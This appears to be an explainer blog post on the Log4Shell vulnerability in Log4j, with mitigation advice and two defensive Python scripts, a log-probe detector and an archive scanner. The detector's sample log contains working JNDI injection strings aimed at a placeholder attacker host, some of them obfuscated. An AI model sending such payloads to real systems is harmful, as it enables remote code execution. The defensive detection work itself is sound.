By now you may have already heard of the Log4j vulnerability. If you haven’t, here is an easy-to-digest update on the current situation.

What is it?

Simply put, it is a vulnerability in Log4j, a very widely used logging library for Java applications. The flaw is tracked as CVE-2021-44228 and is commonly called Log4Shell. Log4j evaluates special lookup strings of the form ${...} that appear inside the messages it logs, and one of those lookups (JNDI) can be pointed at a server the attacker controls, which then supplies code for the application to load. So if an attacker can get a crafted string into anything your application logs, they get remote code execution and the possibility to completely take over your system.

The vulnerability was given a CVSS rating of 10.0 (Critical), which is the highest possible score.
It was initially thought that only internet-facing web servers were at risk. Unfortunately this is not the case. The malicious string is just text, and it is dangerous wherever it ends up being logged: a username or form field, an HTTP header such as User-Agent, a chat message, or a request that a malicious web page makes your browser send to a service on your internal network. Internal systems that never face the internet directly can therefore still be compromised.
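As an added example (not part of the original post), here is a small Python detector that looks for Log4Shell probe strings in web server logs, including the percent-encoded and nested-lookup variants attackers used to hide the literal "jndi". The log lines and the host attacker.example are constructed for the example.

```python
import re
from urllib.parse import unquote

# Log4j lookups have the form ${name:argument}. Attackers hid the literal "jndi"
# behind nested lookups that evaluate to single letters, such as ${${lower:j}ndi:...}
# or ${${env:NOPE:-j}ndi:...}. Each rule below rewrites one kind of nested lookup
# to the text Log4j would substitute for it; innermost lookups resolve first.
_NESTED_LOOKUPS = [
    # ${lower:J} and ${upper:j} both become the bare argument; case does not matter to the detector
    (re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE), r"\1"),
    # ${::-j}, ${env:NOPE:-j}, ${sys:NOPE:-j}: a lookup that fails, so the default after ":-" is used
    (re.compile(r"\$\{[^${}]*:-([^${}]*)\}"), r"\1"),
    # ${date:'j'}: the date lookup echoes quoted literal text unchanged
    (re.compile(r"\$\{date:'([^'${}]*)'\}", re.IGNORECASE), r"\1"),
]
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalize(text):
    """Percent-decode and collapse nested lookups until the text stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = unquote(text)
        for pattern, replacement in _NESTED_LOOKUPS:
            text = pattern.sub(replacement, text)
    return text


def is_log4shell_probe(text):
    """True if the text contains a JNDI lookup once the obfuscation is stripped."""
    return _JNDI.search(normalize(text)) is not None


def find_probes(log_text):
    """Return (line number, normalized line) for every log line that carries a probe."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if is_log4shell_probe(line):
            hits.append((number, normalize(line)))
    return hits


# Constructed sample access log (Apache combined format); attacker.example is a placeholder host.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:13:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"
203.0.113.9 - - [10/Dec/2021:13:01:06 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.9 - - [10/Dec/2021:13:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}${::-n}di:rmi://attacker.example/x}"
198.51.100.2 - - [10/Dec/2021:13:02:00 +0000] "GET /price?total=${amount} HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for number, line in find_probes(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

A hit only shows that a probe reached a log, not that it worked: whether the string was actually evaluated depends on the application that logged it and which Log4j version it bundles. Note also that the benign ${amount} on the last line is not flagged, because only the jndi lookup matters here.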

For vendors and developers, the best recommendation at this point is to upgrade to Log4j 2.17.0 or later; the earlier fixes in 2.15.0 and 2.16.0 each turned out to have remaining problems, which is why the target version has moved. Where an upgrade is not yet possible, removing the JndiLookup class from the log4j-core jar is the mitigation Apache published. For end users and system administrators, the current challenge isn’t just fixing it; it is finding out where you need to fix it. Log4j is rarely installed on its own: it ships inside the applications and appliances that use it, often as a jar nested inside another jar or a WAR file, so every copy has to be found and a patched build obtained from each vendor.
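As an added example (not part of the original post), here is a Python script that does the "finding": it walks a directory, opens every jar, war, ear and zip, recurses into archives nested inside them, and reports each copy of log4j-core with its version, whether the JndiLookup class is still present, and whether it is below 2.17.0. The sample WAR it scans is constructed inside the script, and the version threshold and status labels are this example's own choices.

```python
import io
import itertools
import tempfile
import zipfile
from pathlib import Path

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Log4j 2.x core classes live under this prefix (Log4j 1.x uses org/apache/log4j/, a separate code base).
CORE_PREFIX = "org/apache/logging/log4j/core/"
# The class that performs JNDI lookups; deleting it from the jar was the widely used emergency mitigation.
JNDI_LOOKUP = CORE_PREFIX + "lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 17, 0)  # the version the post recommends; raise it as newer advisories appear

def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable (major, minor, patch) tuple."""
    nums = []
    for part in text.strip().split(".")[:3]:
        digits = "".join(itertools.takewhile(str.isdigit, part))
        nums.append(int(digits) if digits else 0)
    return tuple(nums + [0] * (3 - len(nums)))

def log4j_core_version(zf):
    """Version from Maven pom.properties, else from the manifest if it names Log4j Core; None if absent."""
    names = set(zf.namelist())
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    if "META-INF/MANIFEST.MF" in names:
        fields = {}
        for line in zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
            if ":" in line and not line.startswith(" "):   # continuation lines start with a space
                key, value = line.split(":", 1)
                fields[key.strip()] = value.strip()
        if "log4j core" in fields.get("Implementation-Title", "").lower():
            return fields.get("Implementation-Version")
    return None

def scan_archive(zf, path, findings):
    """Record log4j-core found in this archive, then recurse into nested jars (WEB-INF/lib, shaded jars)."""
    names = zf.namelist()
    if any(n.startswith(CORE_PREFIX) for n in names):
        version = log4j_core_version(zf)
        has_jndi = JNDI_LOOKUP in names
        if version and parse_version(version) >= FIXED:
            status = "patched"
        elif not has_jndi:
            status = "mitigated"       # JndiLookup.class has been stripped out
        elif version:
            status = "needs upgrade"
        else:
            status = "unknown"         # core classes present but no version metadata: review by hand
        findings.append({"path": path, "version": version, "jndi_lookup": has_jndi, "status": status})
    for n in names:
        if n.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(n)))
            except zipfile.BadZipFile:
                continue
            scan_archive(inner, f"{path}!/{n}", findings)

def scan_tree(root):
    """Walk a directory tree and return one finding per copy of log4j-core, nested copies included."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(p) as zf:
                    scan_archive(zf, str(p), findings)
            except zipfile.BadZipFile:
                continue
    return findings

def build_sample_war(directory):
    """Constructed fixture, not a real artifact: a WAR bundling a skeleton log4j-core-2.14.1.jar.
    Only the entries the scanner inspects are present, and the .class body is a placeholder, not bytecode."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as zf:
        zf.writestr(POM_PROPS, "version=2.14.1\nartifactId=log4j-core\n")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    war = Path(directory) / "app.war"
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
    return war

def scan_sample():
    """Build the fixture in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_war(tmp)
        return scan_tree(tmp)

if __name__ == "__main__":
    for finding in scan_sample():
        print(finding["status"], finding["version"], finding["path"])
```

Point scan_tree at an application's install directory or a whole filesystem. It covers archives on disk only; a copy of log4j-core that is already loaded in a running JVM, or vendored with its classes unpacked rather than jarred, needs a different check (for example, inspecting the process classpath).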

You may have already had some of your software vendors or your IT team (if you have one) reach out regarding this or maybe they have been working on getting you patched behind the scenes.

If not, or if you think you may be vulnerable and need help investigating or patching, please reach out.